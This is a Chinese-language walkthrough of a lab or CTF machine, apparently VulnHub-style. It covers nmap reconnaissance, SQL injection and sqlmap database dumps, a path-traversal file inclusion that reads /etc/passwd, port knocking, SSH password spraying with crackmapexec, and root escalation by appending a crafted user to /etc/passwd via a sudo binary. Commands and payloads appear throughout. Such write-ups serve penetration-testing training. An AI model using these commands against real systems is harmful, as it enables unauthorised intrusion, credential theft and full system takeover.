信息收集
tcp开放端口探测
# Nmap 7.93 scan initiated Fri May 3 19:52:13 2024 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.43.170
Nmap scan report for 192.168.43.170
Host is up (0.00073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
MAC Address: 00:0C:29:4A:C5:3B (VMware)
# Nmap done at Fri May 3 19:52:28 2024 -- 1 IP address (1 host up) scanned in 15.16 seconds
udp开放端口探测
# Nmap 7.93 scan initiated Fri May 3 20:20:36 2024 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.43.170
Warning: 192.168.43.170 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.43.170
Host is up (0.00074s latency).
All 65535 scanned ports on 192.168.43.170 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:4A:C5:3B (VMware)
# Nmap done at Fri May 3 20:22:01 2024 -- 1 IP address (1 host up) scanned in 85.84 seconds
tcp开放端口服务探测
# Nmap 7.93 scan initiated Fri May 3 19:53:54 2024 as: nmap -sT -sV -O -p22,80, -oA open_port_service 192.168.43.170
Nmap scan report for 192.168.43.170
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:4A:C5:3B (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=5/3%OT=80%CT=22%CU=38670%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=663532E2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=N)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 3 19:54:26 2024 -- 1 IP address (1 host up) scanned in 32.04 seconds
tcp开放服务的漏洞脚本扫描
# Nmap 7.93 scan initiated Fri May 3 19:54:26 2024 as: nmap --script=vuln -p22,80, -oA vuln_scan 192.168.43.170
Nmap scan report for 192.168.43.170
Host is up (0.00054s latency).
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.170
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.43.170:80/manage.php
| Form id:
| Form action: manage.php
|
| Path: http://192.168.43.170:80/search.php
| Form id:
|_ Form action: results.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:4A:C5:3B (VMware)
# Nmap done at Fri May 3 19:55:11 2024 -- 1 IP address (1 host up) scanned in 45.18 seconds
从扫描出的信息可以看出,22端口的流量被过滤,可能是防火墙,也可能是knock或者其他类似功能的工具,先把这些信息记在脑子里。
getshell
80端口
打开后对网址提供的功能进行测试
display.php页面提供了全部员工信息,search.php页面提供搜索功能,对search.php页面进行sql注入测试,先正常查询
然后在正常查询的基础上做sql注入测试,我这里使用万能语句Mary’ or 1=1 – +
发现全部信息都回显了
证明其有sql注入,使用sqlmap加快测试速度;将查询请求流经burpsuite,复制请求数据到文件中
查库
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql --dbs
查数据
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql -D users --dump-all
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql -D Staff --dump-all
查当前用户权限,判断是否可读可写
sqlmap -r search.req --batch --risk=3 --level=5 --dbms=mysql --is-dba
hash拿到这个网址破解
https://hashes.com/en/decrypt/hash
得到明文密码transorbital1,利用凭据登录80端口manage.php
登录后看到页面下方出现File does not exist信息,猜测这里可以进行动态文件包含
尝试输入参数进行利用,成功看到/etc/passwd的信息
http://192.168.43.170/welcome.php?file=../../../../../../../etc/passwd
注:file参数是怎么得来的?我这里全凭经验,一般php文件包含参数优先尝试file,files,value,filename,如果不行就借助ffuf或者wfuzz工具和fuzzDicts字典。
ctrl+u查看源码,复制passwd文件信息,保存到文件中,利用以下命令提取可登录用户
cat tmp|grep sh$|awk -F':' '{print $1}' >user.txt
还记得nmap扫描出22端口为filtered状态?尝试读取knock的配置文件/etc/knockd.conf
可以看到, [openSSH] sequence = 7469,8475,9842 ,利用knock工具进行敲门
knock 192.168.43.170 7469 8475 9842
再使用nmap扫描tcp开放端口,发现22端口状态变为open
将sql注入得到的全部密码制作成密码本进行密码喷洒
crackmapexec ssh 192.168.43.170 -u user.txt -p password.txt --continue-on-success|grep '+'
![外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5C11365%5CAppData%5CLocal%5CTemp%
5Cksohtml26648%5Cwps3.jpg&pos_id=img-WRYSOb0w-1714793863471)
得到三个有效凭据,一一进行登录
提权
chandlerb和joeyt用户登陆后未有敏感信息和特权命令,janitor用户登录后其家目录下有个隐藏目录,里边存在密码字典
再进行密码喷洒,得到新凭据
fredf用户登录后执行
sudo -l
发现存在特权命令
NOPASSWD /opt/devstuff/dist/test/test
在opt/devstuff/下发现源码
可以看出其功能是将读取指定文件内容追加到目标文件,因此可以往/etc/passwd文件写入root权限用户
得到密码hash
openssl passwd -1 1234567
参考passwd的root行格式,将x替换为hash,写入到/tmp/test1文件中
然后执行
sudo /opt/devstuff/dist/test/test /tmp/test1 /etc/passwd
可以看到追加新用户成功
直接切换用户
su - xiaoliyu
密码为1234567